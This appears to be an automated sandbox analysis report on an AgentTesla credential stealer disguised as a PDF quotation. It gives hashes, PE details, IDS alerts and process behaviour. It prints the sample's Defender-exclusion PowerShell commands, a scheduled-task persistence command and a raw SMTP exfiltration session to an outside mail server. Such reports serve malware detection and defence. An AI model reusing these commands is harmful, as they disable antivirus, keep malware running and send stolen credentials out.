                                                      Download File
                                                      Process:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Users\user\Documents\20220626\PowerShell_transcript.377142.MMcHz80l.20220626092227.txt

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):5773
                                                      Entropy (8bit):5.404171858036157
                                                      Encrypted:false
                                                      SSDEEP:96:BZNhKNdAqDo1ZV1ZMhKNdAqDo1Z8vd3jZMLhKNdAqDo1ZO6nnvZA:j
                                                      MD5:D5B13AAFFF1D8A6E7B1B3A8C47DC4FBD
                                                      SHA1:3E3B7108F50289B81F4CFFA2E7FB8A8A00F99A06
                                                      SHA-256:A686F3F41746F652FD0EAACBC43A64CB90CE0D5835B37FE548885D8C33E463E6
                                                      SHA-512:E8F0C303DE0CFE99A04A9F8066DAEDC37FF442C72F49F866E4690AB8BEA6965EEFAF64CFAF0625F8628A5B0B74E6A923238ED1834552ECB2E07028D2610605FC
                                                      Malicious:false
                                                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220626092228..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XrgnLg.exe..Process ID: 6712..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220626092228..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XrgnLg.exe..**********************..Windows PowerShell transcript start..Start time: 20220626092650..Username: computer\user..RunAs User: computer\user..Confi

                                                      C:\Users\user\Documents\20220626\PowerShell_transcript.377142.X4GIrLBG.20220626092225.txt

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):3643
                                                      Entropy (8bit):5.382961319466384
                                                      Encrypted:false
                                                      SSDEEP:96:BZXhKNJRbqDo1Z/RCDIZBhKNJRbqDo1Z5qDcD0RD0cD0RD0cD0RD0ZZu:nYyononol
                                                      MD5:3BACB553A7A293802400703686AC82B4
                                                      SHA1:7DBE2D86F2C0B0E7FBEDC6FCB0A374B4EFF987AD
                                                      SHA-256:80B8C4A90450CB5BFCC2C3DEF130735A6C502819494E0BE57E5F327B36DFA0BD
                                                      SHA-512:C37AD4F0C1F02290265B81C57012898FAB732A6537B3845B220DDB59EE2B0349FF7EEDC0CE459871686FEA73D54A0C43910974D749F4282A772F0590F1CB82AB
                                                      Malicious:false
                                                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220626092226..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe..Process ID: 6608..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220626092226..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe..**********************..Command start time: 20220626092534..**********************..PS>TerminatingError(Add-MpPreference):

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.805349083482096
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:UN-Quotation 70000000187366444_PDF.exe
                                                      File size:625152
                                                      MD5:0bfb0ab1e8c7ec929e44d70c196b4d21
                                                      SHA1:89c971ae9a832cdfe2e56e8adfe9972505059c2c
                                                      SHA256:cae7db67ae977f3f41349954ecedd51d0248924012fbcb33610e44ced5f24611
                                                      SHA512:f72f7217e75ea998167cbb70df95926856b7c0dc2bdacb044d5e8df16381ca05e740d71cda374567b7ab6dcc9f4427d5b1bf5b96e1c6f737ce44708c3ddabe6c
                                                      SSDEEP:12288:ovHH2iNDkPRxliW1QqaqYfTY0U0k6QDdWl0KZDHQGET1t1XGOgSCMVNQ:k1pkPRrhwfTY9jBW9AZXWvSCMVNQ
                                                      TLSH:37D4F145F396499DC043127598D9C368222AB387116EC2C679FB321ADD3E3EB53A2F47
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0..F...B.......e... ........@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:6aca8ae6e0fcc6d2

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4965de
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x62B7DF14 [Sun Jun 26 04:22:44 2022 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x965900x4b.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x980000x3f74.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x945e40x94600False0.8827993365627632data7.847857536771399IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x980000x3f740x4000False0.15765380859375data3.6117029811673764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x9c0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x981480x468GLS_BINARY_LSB_FIRST
                                                      RT_ICON0x985b00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 16485773, next used block 16420494
                                                      RT_ICON0x996580x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                      RT_GROUP_ICON0x9bc000x30data
                                                      RT_VERSION0x9bc300x344data

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      192.168.2.3193.46.84.142497415872840032 06/26/22-09:22:47.581294TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249741587192.168.2.3193.46.84.142
                                                      192.168.2.3193.46.84.142497415872030171 06/26/22-09:22:47.581243TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49741587192.168.2.3193.46.84.142
                                                      192.168.2.3193.46.84.142497415872851779 06/26/22-09:22:47.581294TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49741587192.168.2.3193.46.84.142

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jun 26, 2022 09:22:44.188890934 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:44.237401962 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:44.237498045 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.228558064 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.229017019 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.282099962 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.283965111 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.335561991 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.335999012 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.422240019 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.423346043 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.474385977 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.474662066 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.531780958 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.531959057 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.580188990 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.580260992 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.581243038 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.581294060 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.582186937 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.582243919 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.632070065 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.633296013 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.636192083 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.689951897 CEST49741587192.168.2.3193.46.84.142

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jun 26, 2022 09:22:44.086308002 CEST4931653192.168.2.38.8.8.8
                                                      Jun 26, 2022 09:22:44.153042078 CEST53493168.8.8.8192.168.2.3

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Jun 26, 2022 09:22:44.086308002 CEST192.168.2.38.8.8.80x456bStandard query (0)mail.bonsa.ltA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Jun 26, 2022 09:22:44.153042078 CEST8.8.8.8192.168.2.30x456bNo error (0)mail.bonsa.lt193.46.84.142A (IP address)IN (0x0001)

                                                      SMTP Packets

                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                      Jun 26, 2022 09:22:47.228558064 CEST58749741193.46.84.142192.168.2.3220 jonas.domenai.lt ESMTP Exim 4.94.2 Sun, 26 Jun 2022 10:22:47 +0300
                                                      Jun 26, 2022 09:22:47.229017019 CEST49741587192.168.2.3193.46.84.142EHLO 377142
                                                      Jun 26, 2022 09:22:47.282099962 CEST58749741193.46.84.142192.168.2.3250-jonas.domenai.lt Hello 377142 [102.129.143.61]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPE_CONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Jun 26, 2022 09:22:47.283965111 CEST49741587192.168.2.3193.46.84.142AUTH login Z2llZHJlQGJvbnNhLmx0
                                                      Jun 26, 2022 09:22:47.335561991 CEST58749741193.46.84.142192.168.2.3334 UGFzc3dvcmQ6
                                                      Jun 26, 2022 09:22:47.422240019 CEST58749741193.46.84.142192.168.2.3235 Authentication succeeded
                                                      Jun 26, 2022 09:22:47.423346043 CEST49741587192.168.2.3193.46.84.142MAIL FROM:<giedre@bonsa.lt>
                                                      Jun 26, 2022 09:22:47.474385977 CEST58749741193.46.84.142192.168.2.3250 OK
                                                      Jun 26, 2022 09:22:47.474662066 CEST49741587192.168.2.3193.46.84.142RCPT TO:<markjeffxnt3@gmail.com>
                                                      Jun 26, 2022 09:22:47.531780958 CEST58749741193.46.84.142192.168.2.3250 Accepted
                                                      Jun 26, 2022 09:22:47.531959057 CEST49741587192.168.2.3193.46.84.142DATA
                                                      Jun 26, 2022 09:22:47.580260992 CEST58749741193.46.84.142192.168.2.3354 Enter message, ending with "." on a line by itself
                                                      Jun 26, 2022 09:22:47.582243919 CEST49741587192.168.2.3193.46.84.142.
                                                      Jun 26, 2022 09:22:47.636192083 CEST58749741193.46.84.142192.168.2.3250 OK id=1o5MbX-0000zn-Hx

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:09:22:06
                                                      Start date:26/06/2022
                                                      Path:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe"
                                                      Imagebase:0x280000
                                                      File size:625152 bytes
                                                      MD5 hash:0BFB0AB1E8C7EC929E44D70C196B4D21
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Target ID:4
                                                      Start time:09:22:22
                                                      Start date:26/06/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      Imagebase:0x1130000
                                                      File size:430592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Target ID:5
                                                      Start time:09:22:24
                                                      Start date:26/06/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:6
                                                      Start time:09:22:25
                                                      Start date:26/06/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
                                                      Imagebase:0x1130000
                                                      File size:430592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Target ID:7
                                                      Start time:09:22:25
                                                      Start date:26/06/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:8
                                                      Start time:09:22:25
                                                      Start date:26/06/2022
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp
                                                      Imagebase:0xc0000
                                                      File size:185856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:9
                                                      Start time:09:22:26
                                                      Start date:26/06/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:10
                                                      Start time:09:22:29
                                                      Start date:26/06/2022
                                                      Path:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      Imagebase:0xa60000
                                                      File size:625152 bytes
                                                      MD5 hash:0BFB0AB1E8C7EC929E44D70C196B4D21
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.510843577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.510843577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.293458897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.293458897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:10.2%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:97
                                                        Total number of Limit Nodes:6
                                                        execution_graph 13392 b6c090 GetCurrentProcess 13393 b6c103 13392->13393 13394 b6c10a GetCurrentThread 13392->13394 13393->13394 13395 b6c147 GetCurrentProcess 13394->13395 13396 b6c140 13394->13396 13397 b6c17d 13395->13397 13396->13395 13398 b6c1a5 GetCurrentThreadId 13397->13398 13399 b6c1d6 13398->13399 13400 b6c2b8 DuplicateHandle 13401 b6c34e 13400->13401 13402 b69c98 13403 b69ca7 13402->13403 13406 b69d90 13402->13406 13414 b69d7f 13402->13414 13407 b69da3 13406->13407 13408 b69dbb 13407->13408 13422 b6a018 13407->13422 13426 b6a008 13407->13426 13408->13403 13409 b69db3 13409->13408 13410 b69fb8 GetModuleHandleW 13409->13410 13411 b69fe5 13410->13411 13411->13403 13415 b69da3 13414->13415 13416 b69dbb 13415->13416 13420 b6a018 LoadLibraryExW 13415->13420 13421 b6a008 LoadLibraryExW 13415->13421 13416->13403 13417 b69db3 13417->13416 13418 b69fb8 GetModuleHandleW 13417->13418 13419 b69fe5 13418->13419 13419->13403 13420->13417 13421->13417 13423 b6a02c 13422->13423 13424 b6a051 13423->13424 13430 b69110 13423->13430 13424->13409 13428 b6a018 13426->13428 13427 b6a051 13427->13409 13428->13427 13429 b69110 LoadLibraryExW 13428->13429 13429->13427 13432 b6a1f8 LoadLibraryExW 13430->13432 13433 b6a271 13432->13433 13433->13424 13434 b640e8 13435 b64105 13434->13435 13436 b64115 13435->13436 13444 b64248 13435->13444 13440 b63c78 13436->13440 13438 b6414b 13441 b63c83 13440->13441 13449 b65960 13441->13449 13443 b671cf 13443->13438 13445 b6426d 13444->13445 13501 b64338 13445->13501 13505 b64348 13445->13505 13450 b6596b 13449->13450 13453 b65990 13450->13453 13452 b6742d 13452->13443 13454 b6599b 13453->13454 13457 b659c0 13454->13457 13456 b67502 13456->13452 13458 b659cb 13457->13458 13461 b66ed4 13458->13461 13460 b67602 13460->13456 13462 b66edf 13461->13462 13463 b67d5c 13462->13463 13465 b6bdb8 13462->13465 13463->13460 13466 b6bde9 13465->13466 13467 b6be0d 13466->13467 13470 b6bf78 13466->13470 13474 b6bf69 13466->13474 13467->13463 13472 b6bf85 13470->13472 13471 b6bfbf 13471->13467 13472->13471 13478 b6aa34 13472->13478 13475 b6bf78 13474->13475 13476 b6bfbf 13475->13476 13477 b6aa34 2 API calls 13475->13477 13476->13467 13477->13476 13479 b6aa3f 13478->13479 13480 b6ccb8 13479->13480 13482 b6c854 13479->13482 13483 b6c85f 13482->13483 13484 b66ed4 2 API calls 13483->13484 13485 b6cd27 13484->13485 13489 b6ea9a 13485->13489 13495 b6eaa8 13485->13495 13486 b6cd60 13486->13480 13491 b6eb25 13489->13491 13492 b6ead9 13489->13492 13490 b6eae5 13490->13486 13491->13486 13492->13490 13493 b6ef28 LoadLibraryExW GetModuleHandleW 13492->13493 13494 b6ef18 LoadLibraryExW GetModuleHandleW 13492->13494 13493->13491 13494->13491 13497 b6eb25 13495->13497 13498 b6ead9 13495->13498 13496 b6eae5 13496->13486 13497->13486 13498->13496 13499 b6ef28 LoadLibraryExW GetModuleHandleW 13498->13499 13500 b6ef18 LoadLibraryExW GetModuleHandleW 13498->13500 13499->13497 13500->13497 13503 b64349 13501->13503 13502 b6444c 13503->13502 13509 b63e70 13503->13509 13507 b6436f 13505->13507 13506 b6444c 13506->13506 13507->13506 13508 b63e70 